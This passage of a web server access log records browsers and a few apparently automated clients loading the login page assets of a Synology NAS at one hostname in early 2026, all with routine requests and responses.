"/webman/3rdparty/FileTaskMonitor/style.css?v=1657097197" [Client 49.12.172.234] [Length 644] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynoFinder/style.css?v=1670389783" [Client 49.12.172.234] [Length 22699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VPNCenter/style.css?v=1656648365" [Client 49.12.172.234] [Length 1201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AudioStation/style.css?v=1670317322" [Client 49.12.172.234] [Length 17366] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DownloadStation/style.css?v=1714372160" [Client 49.12.172.234] [Length 5968] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" [Client 49.12.172.234] [Length 3834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DirectoryServer/style.css?v=1657077274" [Client 49.12.172.234] [Length 1980] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 49.12.172.234] [Length 1165] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/MediaServer/style.css?v=1733153684" [Client 49.12.172.234] [Length 877] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyApplicationService/style.css?v=1675505560" [Client 49.12.172.234] [Length 2208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HyperBackup/style.css?v=1666887595" [Client 49.12.172.234] [Length 20594] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-Drive/style.css?v=1731304858" [Client 49.12.172.234] [Length 75280] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebDAVServer/style.css?v=1767609886" [Client 49.12.172.234] [Length 294] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AntiVirus/style.css?v=1676872996" [Client 49.12.172.234] [Length 5551] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive/style.css?v=1731304862" [Client 49.12.172.234] [Length 13476] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/DhcpServer/style.css?v=1639559986" [Client 49.12.172.234] [Length 2046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ActiveInsight/style.css?v=1706865053" [Client 49.12.172.234] [Length 797] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/style.css?v=1711016943" [Client 49.12.172.234] [Length 102713] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synocredential.js/synocredential.min.js?v=1661507553" [Client 49.12.172.234] [Length 5114] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/synowebapi.js/synowebapi.min.js?v=1653287912" [Client 49.12.172.234] [Length 12470] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/babel-polyfill/polyfill.js?v=1650348555" [Client 49.12.172.234] [Length 47694] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.SessionData&version=1&method=getjs&SynoToken=&v=1656670912" [Client 49.12.172.234] [Length 725] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/adapter/ext/ext-base.js?v=1650348555" [Client 49.12.172.234] [Length 12041] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VideoStation/controller/ui/style.css?v=3.0.7-2512" [Client 49.12.172.234] [Length 14820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/3rdparty/VideoStation/style.css?v=1711016943" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.js?v=1661421011" [Client 49.12.172.234] [Length 889] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.Defs&version=1&method=getjs&v=1745258201" [Client 49.12.172.234] [Length 196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.JSUIString&version=1&method=getjs&lang=hun&v=1665685189" [Client 49.12.172.234] [Length 4648] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webapi/entry.cgi?api=SYNO.Core.Desktop.UIString&version=1&method=getjs&lang=hun&v=1738901725" [Client 49.12.172.234] [Length 586309] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.js?v=1650348555" [Client 49.12.172.234] [Length 8293] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.js?v=1650348555" [Client 49.12.172.234] [Length 5302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/constants.js?v=1650348555" [Client 49.12.172.234] [Length 898] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.js?v=1650348555" [Client 49.12.172.234] [Length 84444] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/index.js?v=1650348555" [Client 49.12.172.234] [Length 4478] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue-router/vue-router.min.js?v=1648175353" [Client 49.12.172.234] [Length 9737] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vuex/vuex.min.js?v=1585722123" [Client 49.12.172.234] [Length 2978] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ext-all.js?v=1650348555" [Client 49.12.172.234] [Length 219382] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/vue/vue.min.js?v=1633587521" [Client 49.12.172.234] [Length 33045] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/sodium.js?v=1650348555" [Client 49.12.172.234] [Length 248661] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/dsm.taskbar.bundle.js?v=1661421011" [Client 49.12.172.234] [Length 32255] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/vendor.js?v=1654081517" [Client 49.12.172.234] [Length 19196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/syno-vue-components.min.js?v=1652869476" [Client 49.12.172.234] [Length 231162] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.common.bundle.js?v=1661421011" [Client 49.12.172.234] [Length 19433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.js?v=1678269761" [Client 49.12.172.234] [Length 92855] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/sds/dist/dsm.sds.bundle.js?v=1661421011" [Client 49.12.172.234] [Length 14204] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/dsm.desktop.bundle.js?v=1661421011" [Client 49.12.172.234] [Length 22969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/entry/dist/dsm.entry.bundle.js?v=1661421011" [Client 49.12.172.234] [Length 783] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:57 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.js?v=1661421011" [Client 49.12.172.234] [Length 8796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/scripts/noise/noise-c.wasm" [Client 49.12.172.234] [Length 159335] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 49.12.172.234] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/2.style.css" [Client 49.12.172.234] [Length 1467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.289c3033f46c70d66aa1.5.js" [Client 49.12.172.234] [Length 2871] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 49.12.172.234] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/dsm.login.bundle.f858f097e152553e708d.2.js" [Client 49.12.172.234] [Length 12146] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 49.12.172.234] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - POST https profibot.synology.me "/webapi/entry.cgi/SYNO.API.Auth.UIConfig" [Client 49.12.172.234] [Length 11914] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 49.12.172.234] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/assets/8d1c89b16774eaa1ed64129f6e5a33da.png" [Client 49.12.172.234] [Length 363] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/webman/login/dist/style.css?v=1661421011" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/login_background.jpg?id=1" [Client 49.12.172.234] [Length 393403] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.js?v=1.0.8-0197" [Client 49.12.172.234] [Length 100237] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SecureSignIn/login-dist/SecureSignInLogin.css?v=1.0.8-0197" [Client 49.12.172.234] [Length 11226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[31/Jan/2026:12:24:58 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 49.12.172.234] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[01/Feb/2026:03:40:34 +0000] - - 301 - GET http profibot.synology.me "/" [Client 164.92.240.50] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[01/Feb/2026:03:40:34 +0000] - - 301 - GET http profibot.synology.me "/favicon.ico" [Client 164.92.240.50] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "http://profibot.synology.me/" +[01/Feb/2026:03:40:34 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 164.92.240.50] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[01/Feb/2026:03:40:35 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico" [Client 164.92.240.50] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:13:54:58 +0000] - - 301 - GET http profibot.synology.me "/" [Client 176.65.132.227] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 4.4.2; GT-P5210 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36" "-" +[02/Feb/2026:13:55:01 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 176.65.132.227] [Length 2007] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Linux; Android 4.4.2; GT-P5210 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36" "http://profibot.synology.me/" +[02/Feb/2026:17:34:08 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 192.227.159.123] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" "-" +[02/Feb/2026:21:00:23 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 54.224.93.144] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "-" +[02/Feb/2026:21:00:23 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 54.224.93.144] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 54.224.93.144] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.css?v=1654081517" [Client 54.224.93.144] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 54.224.93.144] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 54.224.93.144] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 54.224.93.144] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/style.css?v=1661421011" [Client 54.224.93.144] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[02/Feb/2026:21:00:24 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/style.css?v=1661421011" [Client 54.224.93.144] [Length 4183] [Gzip -] 